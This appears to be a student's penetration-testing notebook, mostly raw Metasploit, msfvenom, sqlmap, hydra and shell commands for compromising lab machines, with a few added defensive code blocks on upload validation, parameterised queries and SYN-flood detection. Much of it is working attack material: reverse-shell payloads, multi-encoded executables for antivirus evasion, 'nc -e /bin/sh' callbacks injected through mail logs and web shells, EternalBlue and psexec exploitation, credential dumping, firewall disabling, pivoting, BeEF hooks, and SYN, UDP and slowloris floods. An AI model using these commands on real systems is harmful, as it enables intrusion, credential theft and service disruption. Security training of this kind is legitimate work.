set SESSION 2
run

search scan type:auxiliary


search portscan type:auxiliary
use auxiliary/scanner/portscan/tcp
show options
set PORTS 1-100
set RHOSTS 192.168.100.117 (TARGET 2)
run

search ftp type:auxiliary


use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.100.117 (TARGET 2)
run

search vsftp type:auxiliary


search vsftp
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.100.117 (target 2)
exploit

msfconsole
search hta_server
use exploit/windows/misc/hta_server
show payloads
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set target 1
show options
exploit -j
jobs
sessions
sessions -i 1

msfconsole
search hta_server
use exploit/windows/misc/hta_server
show payloads
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set target 1
show options
exploit -j

jobs
sessions
sessions -i 1

meterpreter
create a dir in c:\ name demo123
hashdump

msfconsole
search hta_server
use exploit/windows/misc/hta_server
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set TARGET 1
show options
exploit -j

sessions

meterpreter>background

search bypassuac
use exploit/windows/local/bypassuac
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
sessions
set SESSION 1
set LPORT 4569
show targets
set target 1
exploit

sessions

sessions -i 2
meterpreter > shell
Process 744 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\System32>netsh advfirewall set allprofiles state off

search persistence
use exploit/windows/local/persistence
set payload payload/windows/meterpreter/reverse_tcp
show options
set session 2
set LPORT 4499
exploit -j

use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.110
set LPORT 4499
exploit -j

msfconsole
search web_delivery
use exploit/multi/script/web_delivery
show targets
set target 2
show payloads
set payload payload/windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.110
set LPORT 4569
show options
exploit -j

open mousepad
copy and paste the command and save the file with a .bat extension

ufile.io
file uploader without registration

download in windows

msfvenom
msfvenom --list platforms
msfvenom --list payloads
msfvenom --list payloads | grep android
msfvenom --list payloads | grep windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4569 --platform windows -f exe -o /root/Desktop/winp.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4569 -f exe -o /root/Desktop/winp1.exe

msfvenom --list payloads


msfvenom --list payloads | grep windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=4566 -f exe -o /root/Desktop/ms.exe

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.122
set LPORT 4566
exploit -j
sessions
sessions -i 1

https://ufile.io
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.122 LPORT=5669 -f elf -o /root/Desktop/linuxms.elf

msfconsole
use multi/handler
set payload linux/x86/shell/reverse_tcp
set LHOST 192.168.0.122
set LPORT 5669
exploit -j
sessions
sessions -i 1

NEW TERMINAL
cd Desktop
python -m http.server 8999

IN TARGET
http://192.168.0.122:8999/linuxms.elf
chmod +x linuxms.elf
./linuxms.elf

KALI : BA- 192.168.0.122

WINDOWS 7: BA,HA - 192.168.0.175 - 192.168.115.7

WINDOWS CLONE: HA - 192.168.115.8


msfconsole

search smb type:exploit


use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOST 192.168.0.175
set SMBUSER forensic
set SMBPASS admin
set LPORT 4567
show options
exploit

meterpreter >background

sessions

search autoroute
use post/multi/manage/autoroute
show options
sessions
set session 1
run

route

search socks
info auxiliary/server/socks_proxy
use auxiliary/server/socks_proxy
show options
sessions
sessions -i 1
run

NEW TERMINAL

mousepad /etc/proxychains4.conf

REMOVE # in dynamic_chains
add # in strict_chain
END OF THE LINE
socks5 127.0.0.1 1080
ctrl+s

proxychains nmap -n -Pn -sT -p 139,445 192.168.115.8


proxychains msfconsole
search smb type:exploit
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
show options
set RHOST 192.168.115.8
set SMBUSER forensic
set SMBPASS admin
set LPORT 5599
show options
exploit

KALI : BA 192.168.0.122
WINDOWS7: BA,HA 192.168.0.175, 192.168.115.7
METASPLOITABLE2: HA 192.168.115.11

portfwd add -l 10080 -p 80 -r 192.168.115.8

KALI IP:- BA

STRAYLIGHT: BA,HA

NEUROMANCER: HA

ip r
arp-scan 192.168.0.0/24
nmap -p 25,3000 --open 192.168.0.0/24

nmap 192.168.0.179 -A

http://192.168.0.179/turing-bolo

http://192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail

TERMINAL
telnet 192.168.0.179 25

mail from:new4
250 2.1.0 Ok

rcpt to:root
250 2.1.5 Ok

data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["cmd"]);?>
.
250 2.0.0 Ok: queued as E669055A6

https://addons.mozilla.org/en-US/firefox/addon/hacktools/
http://192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail&cmd=ls
RIGHT CLICK --> view source

192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail&cmd=nc -e /bin/sh 192.168.0.175 5566

kali terminal
nc -nlvp 5566

python -c 'import pty; pty.spawn("/bin/bash")'

telnet 192.168.0.179 25

mail from:new4
250 2.1.0 Ok

rcpt to:root
250 2.1.5 Ok

subject:"<?php system($_GET["cmd"]);?>"

IN KALI
searchsploit screen 4.5.0
searchsploit -m linux/local/41154.sh
python -m http.server 8456

find / -perm -u=s


wget http://192.168.0.175:8456/41154.sh
chmod +x 41154.sh
./41154.sh

ifconfig

for i in {1..200}; do ping -c 1 192.168.115.$i; done

nc -nvz 192.168.115.13 1-40000

socat TCP-LISTEN:12001,fork TCP:192.168.115.13:8009 &

socat TCP-LISTEN:12002,fork TCP:192.168.115.13:8080 &

socat TCP-LISTEN:12003,fork TCP:192.168.115.13:34483 &


searchsploit struts 2

searchsploit -m linux/webapps/41570.py

python2 41570.py
python2 41570.py http://192.168.0.179:12001/struts2_2.3.15.1-showcase/showcase.action "ls -l"

kingsmen\Administrator

Kali:- 192.168.0.175
server:- 192.168.0.200
client:- 192.168.0.201

msfconsole
search CVE-2017-0143
use exploit/windows/smb/ms17_010_eternalblue
show options
show missing
set RHOSTS 192.168.0.201
show options
set LPORT 3344
show targets
exploit

search domain
search domain type:post
info post/windows/gather/enum_domain
use post/windows/gather/enum_domain
show options
sessions
set SESSION 1
run

search domain type:post


info post/windows/gather/enum_ad_computers
use post/windows/gather/enum_ad_computers
show options
set SESSION 1
run
search domain type:post
info post/windows/gather/enum_ad_users
use post/windows/gather/enum_ad_users
show options
set SESSION 1
run

search domain type:post


info post/windows/manage/add_user
use post/windows/manage/add_user
show options
set SESSION 1
set USERNAME sai
run

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.201
set LPORT 5522
show options
exploit

meterpreter > sysinfo


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token KINGSMEN\\Administrator
meterpreter > background

search token type:exploit


info exploit/windows/local/current_user_psexec
use exploit/windows/local/current_user_psexec
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.0.200
set SESSION 1
set LPORT 5599
exploit

meterpreter > load kiwi


meterpreter > hashdump
meterpreter > creds_all
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.200
set LHOST 192.168.0.175
set LPORT 5599
exploit

search ms17-010
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOST 192.168.0.200
set LHOST 192.168.0.175
set LPORT 4567
exploit

Try to exploit ms17-010 without using msfconsole

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git


cd AutoBlue-MS17-010
pip install -r requirements.txt

cd shellcode
ls
./shell_prep.sh

kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom?
(Y/n)
y
LHOST for reverse connection:
192.168.0.175
LPORT you want x64 to listen on:
6677
LPORT you want x86 to listen on:
6688
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
cd ..
ls -l
chmod u+x eternalblue*
ls -l

python eternalblue_exploit8.py 192.168.0.200 shellcode/sc_x64.bin

NEW TERMINAL
nc -nlvp 6677

python eternalblue_exploit8.py 192.168.0.200 shellcode/sc_x64.bin

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.175 LPORT=4567 -f exe -o /root/Desktop/sc.exe
cd Desktop
python -m http.server 8999

IN WINDOWS TYPE http://192.168.0.175:8999/sc.exe

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.175
set LPORT 4567
exploit -j
sessions
sessions -i 1

meterpreter > sysinfo


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token KINGSMEN\\Administrator
meterpreter > background

search user_psex
use exploit/windows/local/current_user_psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
set RHOSTS 192.168.0.200
set SESSION 1
show options
set LPORT 5533
exploit
https://gofile.io/d/GvDbIZ

md5sum user.txt
sha1sum user.txt
sha256sum user.txt

https://www.quickhash-gui.org/downloads/

$1$ MD5
$5$ sha 256
$6$ sha 512
$2y$ bcrypt (eksblowfish)

hash-identifier

john --list=formats
john --format=Raw-MD5 /root/hash1.txt

john --list=formats
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1 /root/hash2.txt

F1CF651CE1A2191A760C0B2F161234F7958E26E4 (rockyou)

4BC48E00300464D2670958AB3C8982EA (india123)
7C222FB2927D828AF22F592134E8932480637C0D (12345678)

https://crackstation.net/

ps aux | grep john


kill -9 54124

msfvenom --list encoders


msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -i 5 LHOST=192.168.0.125
LPORT=4567 -f exe -o /root/Desktop/win1.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4567 -f exe -o /root/Desktop/win2.exe

upx win2.exe -o win2encoded.exe

strings -a win2encoded.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4566 -x filename1.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 8 -f exe -o multiencoded.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe -o /root/Desktop/win32.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe -o /root/Desktop/win64.exe

cd /root/Desktop
ls
file win32.exe
file win64.exe

xxd -l 20 win32.exe

https://en.wikipedia.org/wiki/List_of_file_signatures

https://www.virustotal.com/gui/home/upload

md5sum win64.exe
sha1sum win64.exe

strings -a win64.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.125 LPORT=4569 -f exe -o /root/Desktop/win64.exe
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.125
set LPORT 4569
exploit -j

process hacker
netstat -ano
tasklist /v
Event Viewer > Applications and Services Logs > Microsoft > Windows > Windows Defender > Operational

1000
1001
1006
1116
1117

ssh -R 4599:localhost:4222 serveo.net

New terminal
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4599 -f exe -o /root/Desktop/winwan1.exe

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4222
exploit -j

ssh -R 9696:localhost:9966 serveo.net


new terminal
msfconsole
use exploit/windows/misc/hta_server
set LHOST serveo.net
set LPORT 9696
exploit -j

http://192.168.0.125:8080/dw7iNPS5.hta
(kali ip)
download in kali system and upload the file in gofile.io

In same console
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 9966
exploit -j

apt update
apt install tor
service tor start
mousepad /etc/proxychains4.conf
Remove # in dynamic_chains
add # in #strict_chain

End of line
socks5 127.0.0.1 9050

service tor restart


proxychains firefox

ip.addr==192.168.0.100
tcp
tcp.port==80
udp.port==53

ip.addr==192.168.0.100 && tcp.port==443

1) type of attack
2) attacker ip address

cd /root/Downloads
ls
unzip vpnbook-openvpn-de20.zip
ls
cd vpnbook-openvpn-de20
openvpn vpnbook-de20-tcp80.ovpn

https://www.vpnbook.com/#google_vignette

protonvpn debian install

https://protonvpn.com/support/official-linux-vpn-debian?srsltid=AfmBOoqJy93kwa8XPY946kOgbMmLiulahSEIzJfaPhJ2DmHHo6elU-m4

wget https://repo.protonvpn.com/debian/dists/stable/main/binary-all/protonvpn-stable-release_1.0.4_all.deb

sudo dpkg -i ./protonvpn-stable-release_1.0.4_all.deb && sudo apt update

sudo apt install proton-vpn-gnome-desktop

protonvpn-app

apt install steghide


steghide
steghide --embed -ef user.txt -cf /root/Downloads/new1.jpeg -sf stegnofile.jpeg
steghide --extract -sf stegnofile.jpeg

THE LOGIN CREDS FOR GMAIL ACCOUNT

MY MAIL ID
https://download.vulnhub.com/gigachad/gigachad_vh.ova

https://github.com/bcoles/local-exploits/blob/master/CVE-2017-5899/exploit.sh
username:chad
password :maidenstower

filetype:pdf ibm qradar documentation

ibm qradar documentation

https://www.ibm.com/docs/en/SS42VS_7.5/pdf/b_qradar_admin_guide.pdf

https://docs.splunk.com/Documentation

#!/bin/bash
#NMAP HOST DISCOVERY SCAN
echo "PERFORMING HOST ALIVE SCAN"
echo "PLEASE ENTER THE SCAN RANGE: "
read ip_range
# -sn: ping scan only, -oG: greppable output so the "Up" lines can be cut
nmap -sn "$ip_range" -oG out.txt
grep Up out.txt > out1.txt
cut -d " " -f 2 out1.txt > out2.txt

echo "PERFORMING PORT SCAN"
echo "ENTER PORT NUMBER TO SCAN"
read port_number
# -iL: take the target list from the alive hosts found above
nmap -p "$port_number" -iL out2.txt -oG out3.txt
grep open out3.txt > out4.txt
cut -d " " -f 2 out4.txt > out5.txt
value=$(<out5.txt)
echo "$value"

echo "SELECT IP ADDRESS TO PERFORM PASSWORD CRACKING: "
read ip_password
echo "ENTER PROTOCOL NAME: "
read service_name
hydra -L /root/userpass.txt -P /root/userpass.txt "$ip_password" -s "$port_number" "$service_name"

Write a Python program to add 2 numbers (input from user)

nmap -A 192.168.0.165

searchsploit drupal 7
searchsploit -m php/webapps/34992.py
python2 34992.py
python2 34992.py -t http://192.168.0.165 -u king -p 1234

msfconsole
search drupal
use exploit/multi/http/drupal_drupageddon
set RHOSTS 192.168.0.165
set LPORT 5566
exploit

meterpreter > getuid
Server username: www-data
meterpreter > shell
Process 1036 created.
Channel 1 created.

bash -i
sudo -l
www-data@HackerSchool:/home/jack$ sudo -u harry find . -exec /bin/sh \; -quit
whoami
bash -i
find / -perm -u=s

harry@HackerSchool:/home/jack$ cd /usr/bin/What_are/you/_searching_/for?/
cd /usr/bin/What_are/you/_searching_/for?/
harry@HackerSchool:/usr/bin/What_are/you/_searching_/for?$ ls
ls
iamhere
harry@HackerSchool:/usr/bin/What_are/you/_searching_/for?$ ./iamhere

http://burp/

P1
admin
test

P2
1234
toor

admin 1234
admin toor
test 1234
test toor

192.168.1.100
192.168.1.200

msfvenom -p php/reverse_php LHOST=192.168.0.155 LPORT=4569 -f raw -o /root/Desktop/webshell1.php

msfconsole
use multi/handler
set payload php/reverse_php
set LHOST 192.168.0.155
set LPORT 4569
exploit -j

Upload the file in browser

Execute in browser
http://192.168.0.146/dvwa/hackable/uploads/webshell1.php

cd /usr/share/webshells/php

BURP SUITE

Content-Type: image/jpeg

http://192.168.0.146/dvwa/hackable/uploads/simple-backdoor.php?cmd=nc -e /bin/sh 192.168.0.155 4566
nc -nlvp 4566

cd /usr/share/webshells/php
mousepad php-reverse-shell.php
$ip = '192.168.0.155'; // CHANGE THIS
$port = 3344; // CHANGE THIS

filename="php-reverse-shell.php.jpg"

Content-Type: image/jpg

192.168.0.146/dvwa/hackable/uploads/php-reverse-shell.php.jpg

nc -nlvp 3344
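The two upload bypasses above (a spoofed Content-Type: image/jpeg, and a double extension like php-reverse-shell.php.jpg) both work because the server trusts what the client says about the file. The `file` and `xxd -l 20` commands and the file-signature list earlier in the notes show the defence: look at the bytes. The validator below is an added example, not code from DVWA or the course notes; its signature table is a small subset of the public list, the allowed-extension map and the PHP-tag check are assumptions for an avatar-upload handler, and the sample blobs are constructed minimal headers rather than real files.

```python
# Leading bytes from the public file-signature list; what `xxd -l 20` shows
SIGNATURES = {
    "jpeg": [b"\xff\xd8\xff"],
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "gif":  [b"GIF87a", b"GIF89a"],
    "pdf":  [b"%PDF-"],
    "exe":  [b"MZ"],          # DOS/PE header, as seen on win32.exe / win64.exe
}

# Image kinds an avatar-upload handler should accept at all (assumed policy)
EXT_TO_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}


def sniff(data: bytes) -> str:
    """Classify content by its magic bytes, ignoring filename and Content-Type."""
    for kind, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return "unknown"


def contains_php_tag(data: bytes) -> bool:
    """A valid image header followed by <?php is the classic polyglot trick."""
    return b"<?php" in data or b"<?=" in data


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason). Every check must pass; the client is never trusted."""
    # 1. Only the final extension counts (x.php.jpg ends in .jpg) and it must be an image one
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = EXT_TO_KIND.get(ext)
    if expected is None:
        return False, f"extension '.{ext}' not allowed"
    # 2. The declared Content-Type is attacker-controlled; require consistency, nothing more
    if not declared_type.lower().startswith("image/"):
        return False, "Content-Type is not an image type"
    # 3. The bytes themselves must carry the signature the extension promises
    actual = sniff(data)
    if actual != expected:
        return False, f"content is {actual}, not {expected}"
    # 4. Reject image/PHP polyglots
    if contains_php_tag(data):
        return False, "PHP tag embedded in image data"
    return True, "ok"


# Constructed samples: minimal headers, not real files
GOOD_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_TEXT = b"<?php phpinfo(); ?>\n"
POLYGLOT = GOOD_JPEG + PHP_TEXT
PE_FILE = b"MZ\x90\x00" + b"\x00" * 16

if __name__ == "__main__":
    for name, ctype, blob in [
        ("photo.jpg", "image/jpeg", GOOD_JPEG),
        ("php-reverse-shell.php.jpg", "image/jpg", PHP_TEXT),   # the bypass from the notes
        ("webshell1.php", "image/jpeg", GOOD_JPEG),
        ("photo.jpg", "image/jpeg", POLYGLOT),
        ("win64.exe", "application/octet-stream", PE_FILE),
    ]:
        print(name, validate_upload(name, ctype, blob))
```

Content checks are only half of it: the stored file should get a server-generated name with a single extension, and the upload directory (here /dvwa/hackable/uploads/) should have script execution disabled, so that even a file that slips through is served as bytes rather than run as PHP.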

apt update
apt install docker.io
docker pull bkimminich/juice-shop

docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop

http://127.0.0.1:3000/#/score-board

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#
http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 1--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 2--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' order by 3--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT 1,2--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=3' UNION SELECT database(),version()--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&Submit=Submit#

http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=2' UNION SELECT 1,group_concat(user_id,0x3d,first_name,0x3d,last_name,0x3d,user,0x3d,password,0x3d,avatar) from users--+&Submit=Submit#

admin,contact,department,external_link,library,menu,page,photo_album,photos,scroller,site,slider,students,students_attendance,tbl_admin,teacher_staff,teacher_staff_attendance,videos
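Every URL above works for one reason: the id parameter is pasted into the SQL text, so a closing quote followed by UNION SELECT becomes part of the statement. The snippet below is an added example, not DVWA's code or part of the course notes: it builds a small in-memory users table (constructed rows), runs the same UNION payload through a string-built query and through a parameterised one, and returns what each leaks. sqlite3 stands in for DVWA's MySQL; the comment syntax and column affinities are SQLite's, and the table layout is an assumption modelled on the column list dumped above.

```python
import sqlite3

UNION_PAYLOAD = "2' UNION SELECT password FROM users--"   # same shape as the DVWA URLs above


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the DVWA users table; rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, user TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "admin", "admin", "HASH-OF-ADMIN-PW"),
            (2, "Gordon", "gordonb", "HASH-OF-GORDON-PW"),
        ],
    )
    return con


def lookup_vulnerable(con, user_id: str):
    """String-built query: the bug behind id=2' UNION SELECT ... in the notes."""
    sql = f"SELECT first_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id: str):
    """Parameterised query: the value is bound as data and never parsed as SQL."""
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def compare(payload: str):
    """Run the same input through both versions; returns (leaked_set, safe_rows)."""
    con = make_db()
    leaked = {row[0] for row in lookup_vulnerable(con, payload)}
    safe = lookup_safe(con, payload)
    con.close()
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = compare(UNION_PAYLOAD)
    print("vulnerable:", sorted(leaked))   # password column leaks alongside first_name
    print("safe:      ", safe)            # no row has a user_id equal to that string
    print("safe, normal input:", lookup_safe(make_db(), "2"))
```

The parameterised version is the fix sqlmap's output is telling you to apply; the cookie-based runs above only show that the same hole is reachable once authenticated, they do not change the remedy.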

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" --dbs

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa --tables

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa -T users
--columns

sqlmap -u "http://192.168.0.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="PHPSESSID=4de718548928f93c712620aeb487fb65;security=low" -D dvwa -T users
-C user,first_name,last_name,password,user_id --dump

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C name,addess,cart,cc,email,pass --dump

jsql

apt update
apt install jsql

jsql
http://testphp.vulnweb.com/artists.php?artist=1

try on altoromutual.com
<script>alert("CSP XSS ATTACK")</script>
login to webpage admin:admin
<script>alert(document.cookie)</script>
<iframe src="https://hackerschool.in"></iframe>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>

hydra -v -V -s 80 altoromutual.com -L /root/username.txt -P /root/password.txt http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:F=Login Failed"

TRY ON DVWA LOGIN WEBPAGE

hydra -v -V -s 80 192.168.0.125 -L /root/username.txt -P /root/password.txt http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed"

nmap 192.168.0.150
nmap 192.168.0.150 -p 80 -A
dirb http://192.168.0.150
mousepad /etc/hosts

#EOF ADD
192.168.0.150 hackerschool.local

dirb http://hackerschool.local/

http://hackerschool.local/wp-admin

crunch 7 7 1891968 -o wordlist1.txt

wpscan --url "http://hackerschool.local/wp-login.php?redirect_to=http%3A%2F%2Fhackerschool.local%2Fwp-admin%2F&reauth=1" -U admin -P /root/wordlist1.txt

[SUCCESS] - admin / 1891968

Appearance --> Editor --> 404.php
cd /usr/share/webshells/php
ls
mousepad php-reverse-shell.php
#REPLACE IP

hackerschool.local/wp-content/themes/twentyseventeen/404.php

nc -nlvp 1234

sudo -l
cd /var/www/html
sudo ./hs.sh

apt update
apt install zaproxy

http://192.168.0.114/mutillidae/index.php?page=text-file-viewer.php

apt update
apt install beef-xss
beef-xss

#SCRIPT FOR HOOKING THE BROWSER
#EXECUTE IN DVWA ON XSS STORED
<script src="http://192.168.0.155:3000/hook.js"></script>

FROM BASE SYSTEM TRY TO ACCESS DVWA WEB PAGE

msfconsole
search synflood
use auxiliary/dos/tcp/synflood
set RHOSTS 192.168.0.114
exploit

git clone https://github.com/gkbrk/slowloris.git
cd slowloris
ls
./slowloris.py 192.168.0.114

hping3 -h
hping3 -S 192.168.0.114 -p 80 --flood
hping3 -S 192.168.0.114 -p 80 --flood --rand-source
nmap -p 53,67,161,514 -sU 192.168.0.114
hping3 -h
hping3 -2 -p 53 192.168.0.114 --flood
hping3 -2 -p 53 192.168.0.114 --flood --rand-source

hping3 -1 192.168.0.220 --flood
hping3 -1 192.168.0.220 --flood --rand-source
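What the SYN flood above looks like from the defender's side, as an added example that is not part of the course notes: a detector over tcpdump-style lines that counts bare SYNs per destination port and per one-second window, compares them with ACKs coming from clients, and notes when the number of distinct sources approaches the number of SYNs, which is the signature of --rand-source. The capture lines are constructed inline (three real handshakes, then 200 SYNs from 200 addresses); the window size, threshold and the 4:1 SYN-to-ACK ratio are assumptions to be tuned against real traffic.

```python
import re
from collections import defaultdict

# tcpdump-style line: "<ts> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>], ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def parse_line(line: str):
    """Return the fields of one capture line, or None if it is not a TCP line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = float(rec["ts"])
    return rec


def detect_syn_flood(lines, window=1.0, syn_threshold=50):
    """One alert per (destination, port, window) whose bare-SYN count is high
    and not matched by a comparable number of client ACKs."""
    buckets = defaultdict(lambda: {"syn": 0, "ack": 0, "sources": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["dst"], rec["dport"], int(rec["ts"] // window))
        b = buckets[key]
        if rec["flags"] == "S":            # bare SYN: a new connection attempt
            b["syn"] += 1
            b["sources"].add(rec["src"])
        elif "." in rec["flags"]:          # ACK set: handshake completed or data flowing
            b["ack"] += 1

    alerts = []
    for (dst, dport, slot), b in sorted(buckets.items()):
        if b["syn"] > syn_threshold and b["syn"] > 4 * max(b["ack"], 1):
            alerts.append({
                "target": f"{dst}:{dport}",
                "window_start": slot * window,
                "syn": b["syn"],
                "distinct_sources": len(b["sources"]),
                # --rand-source style floods show close to one source per SYN
                "spoofed_sources_likely": len(b["sources"]) > b["syn"] // 2,
            })
    return alerts


def build_sample():
    """Constructed capture: three real handshakes, then 200 SYNs from 200 sources."""
    lines = []
    for i, src in enumerate(["10.0.0.11", "10.0.0.12", "10.0.0.13"]):
        port = 50000 + i
        lines.append(f"0.{i}00 IP {src}.{port} > 192.168.0.114.80: Flags [S], seq 0, length 0")
        lines.append(f"0.{i}05 IP 192.168.0.114.80 > {src}.{port}: Flags [S.], ack 1, length 0")
        lines.append(f"0.{i}10 IP {src}.{port} > 192.168.0.114.80: Flags [.], ack 1, length 0")
    for n in range(200):
        lines.append(f"1.{n:03d} IP 172.16.0.{n}.{40000 + n} > 192.168.0.114.80: Flags [S], seq 0, length 0")
    return lines


if __name__ == "__main__":
    for alert in detect_syn_flood(build_sample()):
        print(alert)
```

On a real host the input is `tcpdump -n -tt 'tcp[tcpflags] & tcp-syn != 0'` output; the same SYN-to-ACK imbalance is what SYN cookies and connection-rate limits on the server react to automatically, so the detector is most useful for confirming an attack and identifying the targeted port rather than for blocking by source, which spoofed floods defeat.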

msfconsole
search rdp type:auxiliary
use auxiliary/scanner/rdp/ms12_020_check
show options
set RHOSTS 192.168.0.165
run

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOSTS 192.168.0.165
exploit

TRY MULTIPLE TIMES

#include <stdio.h>
#include <string.h>

int main(void)
{
    char buff[15];
    int pass = 0;   /* lives next to buff on the stack: the variable the overflow clobbers */

    printf ("\n Enter the password: \n");

    /* gets() has no bounds check: this is the deliberate overflow point of the exercise */
    gets(buff);

    if(strcmp(buff, "hacker"))
    {
        printf("\n wrong password\n");
    }
